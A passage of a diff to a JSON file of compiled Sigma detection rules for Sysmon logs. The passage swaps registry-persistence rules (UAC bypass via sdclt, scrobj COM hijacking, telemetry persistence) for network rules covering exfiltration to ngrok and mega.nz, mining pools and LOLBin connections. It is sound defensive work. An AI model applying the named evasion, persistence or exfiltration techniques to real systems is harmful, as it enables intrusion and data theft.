Diagnostics Turn Off Check Enabled - Registry", - "id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", - "status": "experimental", - "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Dllhost Internet Connection", + "id": "cfed2f44-16df-4bf3-833a-79405198b277", + "status": "test", + "description": "Detects Dllhost that communicates with public IP addresses", + "author": "bartblaze", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218", + "attack.execution", + "attack.t1559.001" ], "falsepositives": [ - "Administrator actions" + "Communication to other corporate systems that use IP addresses from public address spaces" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\ScriptedDiagnostics\\\\TurnOffCheck' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR 
DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" ], - "filename": "registry_set_enabling_turnoffcheck.yml" + "filename": "net_connection_win_dllhost_net_connections.yml" }, { - "title": "Suspicious Environment Variable Has Been Registered", - "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", - "status": "test", - "description": "Detects the creation of user-specific or system-wide environment variables via the registry. 
Which contains suspicious commands and strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Communication To Ngrok.Io", + "id": "18249279-932f-45e2-b37a-8925f2597670", + "status": "experimental", + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok.io" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (Details IN ('powershell', 'pwsh') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR Details LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR Details LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR Details LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%SW52b2tlL%' ESCAPE '\\' OR Details LIKE '%ludm9rZS%' ESCAPE '\\' OR Details LIKE '%JbnZva2Ut%' ESCAPE '\\' OR Details LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR Details LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR Details LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (Details LIKE 'SUVY%' ESCAPE '\\' OR Details LIKE 'SQBFAF%' ESCAPE '\\' OR Details LIKE 'SQBuAH%' ESCAPE '\\' OR Details LIKE 'cwBhA%' ESCAPE '\\' OR Details LIKE 'aWV4%' ESCAPE '\\' OR Details LIKE 'aQBlA%' ESCAPE '\\' OR Details LIKE 'R2V0%' ESCAPE '\\' OR Details LIKE 'dmFy%' ESCAPE '\\' OR Details LIKE 'dgBhA%' ESCAPE '\\' OR Details LIKE 'dXNpbm%' ESCAPE '\\' OR Details LIKE 'H4sIA%' ESCAPE '\\' OR Details LIKE 'Y21k%' ESCAPE '\\' OR Details LIKE 'cABhAH%' ESCAPE '\\' OR Details LIKE 'Qzpc%' 
ESCAPE '\\' OR Details LIKE 'Yzpc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" ], - "filename": "registry_set_suspicious_env_variables.yml" + "filename": "net_connection_win_ngrok_io.yml" }, { - "title": "Potential Registry Persistence Attempt Via Windows Telemetry", - "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "title": "Communication To Mega.nz", + "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "status": "test", - "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "author": "Lednyov Alexey, oscd.community, Sreeman", + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of mega.nz uploaders and tools" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (Details LIKE '%.sh%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.bin%' ESCAPE '\\' OR Details LIKE '%.bat%' 
ESCAPE '\\' OR Details LIKE '%.cmd%' ESCAPE '\\' OR Details LIKE '%.js%' ESCAPE '\\' OR Details LIKE '%.ps%' ESCAPE '\\' OR Details LIKE '%.vb%' ESCAPE '\\' OR Details LIKE '%.jar%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.msi%' ESCAPE '\\' OR Details LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((Details LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR Details LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" ], - "filename": "registry_set_telemetry_persistence.yml" + "filename": "net_connection_win_mega_nz.yml" }, { - "title": "Potential Persistence Via Scrobj.dll COM Hijacking", - "id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", - "status": "experimental", - "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", - "author": "frack113", + "title": "Regsvr32 Network Activity", + "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate use of the dll." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%InprocServer32\\\\(Default)' ESCAPE '\\' AND Details LIKE 'C:\\\\WINDOWS\\\\system32\\\\scrobj.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_scrobj_dll.yml" + "filename": "net_connection_win_regsvr32_network_activity.yml" }, { - "title": "Registry Modification to Hidden File Extension", - "id": "5df86130-4e95-4a54-90f7-26541b40aec2", - "status": "test", - "description": "Hides the file extension through modification of the registry", - "author": "frack113", + "title": "Network Communication With Crypto Mining Pool", + "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "status": "stable", + "description": "Detects initiated network connections to crypto mining pools", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Administrative scripts" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\' AND Details = 'DWORD (0x00000002)')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND DestinationHostname IN ('alimabi.cn', 'ap.luckpool.net', 
'bcn.pool.minergate.com', 'bcn.vip.pool.minergate.com', 'bohemianpool.com', 'ca.minexmr.com', 'ca.monero.herominers.com', 'cbd.monerpool.org', 'cbdv2.monerpool.org', 'cryptmonero.com', 'crypto-pool.fr', 'crypto-pool.info', 'cryptonight-hub.miningpoolhub.com', 'd1pool.ddns.net', 'd5pool.us', 'daili01.monerpool.org', 'de.minexmr.com', 'dl.nbminer.com', 'donate.graef.in', 'donate.ssl.xmrig.com', 'donate.v2.xmrig.com', 'donate.xmrig.com', 'donate2.graef.in', 'drill.moneroworld.com', 'dwarfpool.com', 'emercoin.com', 'emercoin.net', 'emergate.net', 'ethereumpool.co', 'eu.luckpool.net', 'eu.minerpool.pw', 'fcn-xmr.pool.minergate.com', 'fee.xmrig.com', 'fr.minexmr.com', 'hellominer.com', 'herominers.com', 'huadong1-aeon.ppxxmr.com', 'iwanttoearn.money', 'jw-js1.ppxxmr.com', 'koto-pool.work', 'lhr.nbminer.com', 'lhr3.nbminer.com', 'linux.monerpool.org', 'lokiturtle.herominers.com', 'luckpool.net', 'masari.miner.rocks', 'mine.c3pool.com', 'mine.moneropool.com', 'mine.ppxxmr.com', 'mine.zpool.ca', 'mine1.ppxxmr.com', 'minemonero.gq', 'miner.ppxxmr.com', 'miner.rocks', 'minercircle.com', 'minergate.com', 'minerpool.pw', 'minerrocks.com', 'miners.pro', 'minerxmr.ru', 'minexmr.cn', 'minexmr.com', 'mining-help.ru', 'miningpoolhub.com', 'mixpools.org', 'moner.monerpool.org', 'moner1min.monerpool.org', 'monero-master.crypto-pool.fr', 'monero.crypto-pool.fr', 'monero.hashvault.pro', 'monero.herominers.com', 'monero.lindon-pool.win', 'monero.miners.pro', 'monero.riefly.id', 'monero.us.to', 'monerocean.stream', 'monerogb.com', 'monerohash.com', 'moneroocean.stream', 'moneropool.com', 'moneropool.nl', 'monerorx.com', 'monerpool.org', 'moriaxmr.com', 'mro.pool.minergate.com', 'multipool.us', 'myxmr.pw', 'na.luckpool.net', 'nanopool.org', 'nbminer.com', 'node3.luckpool.net', 'noobxmr.com', 'pangolinminer.comgandalph3000.com', 'pool.4i7i.com', 'pool.armornetwork.org', 'pool.cortins.tk', 'pool.gntl.co.uk', 'pool.hashvault.pro', 'pool.minergate.com', 'pool.minexmr.com', 
'pool.monero.hashvault.pro', 'pool.ppxxmr.com', 'pool.somec.cc', 'pool.support', 'pool.supportxmr.com', 'pool.usa-138.com', 'pool.xmr.pt', 'pool.xmrfast.com', 'pool2.armornetwork.org', 'poolchange.ppxxmr.com', 'pooldd.com', 'poolmining.org', 'poolto.be', 'ppxvip1.ppxxmr.com', 'ppxxmr.com', 'prohash.net', 'r.twotouchauthentication.online', 'randomx.xmrig.com', 'ratchetmining.com', 'seed.emercoin.com', 'seed.emercoin.net', 'seed.emergate.net', 'seed1.joulecoin.org', 'seed2.joulecoin.org', 'seed3.joulecoin.org', 'seed4.joulecoin.org', 'seed5.joulecoin.org', 'seed6.joulecoin.org', 'seed7.joulecoin.org', 'seed8.joulecoin.org', 'sg.minexmr.com', 'sheepman.mine.bz', 'siamining.com', 'sumokoin.minerrocks.com', 'supportxmr.com', 'suprnova.cc', 'teracycle.net', 'trtl.cnpool.cc', 'trtl.pool.mine2gether.com', 'turtle.miner.rocks', 'us-west.minexmr.com', 'usxmrpool.com', 'viaxmr.com', 'webservicepag.webhop.net', 'xiazai.monerpool.org', 'xiazai1.monerpool.org', 'xmc.pool.minergate.com', 'xmo.pool.minergate.com', 'xmr-asia1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-us.suprnova.cc', 'xmr-usa.dwarfpool.com', 'xmr.2miners.com', 'xmr.5b6b7b.ru', 'xmr.alimabi.cn', 'xmr.bohemianpool.com', 'xmr.crypto-pool.fr', 'xmr.crypto-pool.info', 'xmr.f2pool.com', 'xmr.hashcity.org', 'xmr.hex7e4.ru', 'xmr.ip28.net', 'xmr.monerpool.org', 'xmr.mypool.online', 'xmr.nanopool.org', 'xmr.pool.gntl.co.uk', 'xmr.pool.minergate.com', 'xmr.poolto.be', 'xmr.ppxxmr.com', 'xmr.prohash.net', 'xmr.simka.pw', 'xmr.somec.cc', 'xmr.suprnova.cc', 'xmr.usa-138.com', 'xmr.vip.pool.minergate.com', 'xmr1min.monerpool.org', 'xmrf.520fjh.org', 'xmrf.fjhan.club', 'xmrfast.com', 'xmrigcc.graef.in', 'xmrminer.cc', 'xmrpool.de', 'xmrpool.eu', 'xmrpool.me', 'xmrpool.net', 'xmrpool.xyz', 'xx11m.monerpool.org', 'xx11mv2.monerpool.org', 'xxx.hex7e4.ru', 'zarabotaibitok.ru', 'zer0day.ru'))" ], - 
"filename": "registry_set_hidden_extention.yml" + "filename": "net_connection_win_crypto_mining_pools.yml" }, { - "title": "UAC Bypass via Sdclt", - "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "title": "Excel Network Connections", + "id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", - "author": "Omer Yampel, Christian Burkard (Nextron Systems)", + "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.execution", + "attack.t1203" ], "falsepositives": [ - "Unknown" + "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", + "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", + "It is highly recommended to baseline your activity and tune out common business use cases." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\')))" ], - "filename": "registry_set_uac_bypass_sdclt.yml" + "filename": "net_connection_win_excel_outbound_network_connection.yml" }, { - "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "title": "Suspicious Network Connection to IP Lookup Service APIs", + "id": "edf3485d-dac4-4d50-90e4-b0e5813f7e60", "status": "experimental", - "description": "Detects setting a custom 
URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "author": "frack113", + "description": "Detects external IP address lookups by non-browser processes via services such as \"api.ipify.org\". This could be indicative of potential post compromise internet test activity.", + "author": "Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery", + "attack.t1016" ], "falsepositives": [ - "Unknown" + "Legitimate use of the external websites for troubleshooting or network monitoring" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationHostname LIKE '%api.2ip.ua%' ESCAPE '\\' OR DestinationHostname LIKE '%api.ipify.org%' ESCAPE '\\' OR DestinationHostname LIKE '%bot.whatismyipaddress.com%' ESCAPE '\\' OR DestinationHostname LIKE '%canireachthe.net%' ESCAPE '\\' OR DestinationHostname LIKE '%checkip.amazonaws.com%' ESCAPE '\\' OR DestinationHostname LIKE '%checkip.dyndns.org%' ESCAPE '\\' OR DestinationHostname LIKE '%curlmyip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%edns.ip-api.com%' ESCAPE '\\' OR DestinationHostname LIKE '%eth0.me%' ESCAPE '\\' OR DestinationHostname LIKE '%freegeoip.app%' ESCAPE '\\' OR DestinationHostname LIKE '%icanhazip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ident.me%' ESCAPE '\\' OR DestinationHostname LIKE '%ifconfig.io%' ESCAPE '\\' OR 
DestinationHostname LIKE '%ifconfig.me%' ESCAPE '\\' OR DestinationHostname LIKE '%ip-api.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ip.anysrc.net%' ESCAPE '\\' OR DestinationHostname LIKE '%ip.tyk.nu%' ESCAPE '\\' OR DestinationHostname LIKE '%ipaddressworld.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipecho.net%' ESCAPE '\\' OR DestinationHostname LIKE '%ipinfo.io%' ESCAPE '\\' OR DestinationHostname LIKE '%ipof.in%' ESCAPE '\\' OR DestinationHostname LIKE '%ipv4.icanhazip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipv4bot.whatismyipaddress.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipwho.is%' ESCAPE '\\' OR DestinationHostname LIKE '%l2.io%' ESCAPE '\\' OR DestinationHostname LIKE '%myexternalip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%wgetip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%whatismyip.akamai.com%' ESCAPE '\\' OR DestinationHostname LIKE '%wtfismyip.com%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files 
(x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" + "filename": "net_connection_win_susp_external_ip_lookup.yml" }, { - "title": "Enabling COR Profiler Environment Variables", - "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "title": "Rundll32 Internet Connection", + "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", "status": "test", - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "description": "Detects a rundll32 that communicates with public IP addresses", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.012" + "attack.t1218.011", + "attack.execution" ], - "level": "high", + "falsepositives": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR 
DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\') OR CommandLine LIKE '%PcaSvc.dll,PcaPatchSdbTask%' ESCAPE '\\' OR SourceHostname LIKE '%.internal.cloudapp.net' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND DestinationPort = '443')))" ], - "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + "filename": "net_connection_win_rundll32_net_connections.yml" }, { - "title": "Potential Persistence Via App Paths Default Property", - "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "title": "HH.EXE Network Connections", + "id": "468a8cea-2920-4909-a593-0cbe1d96674a", "status": "experimental", - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.012" + "attack.defense_evasion", + "attack.t1218.001" ], "falsepositives": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE 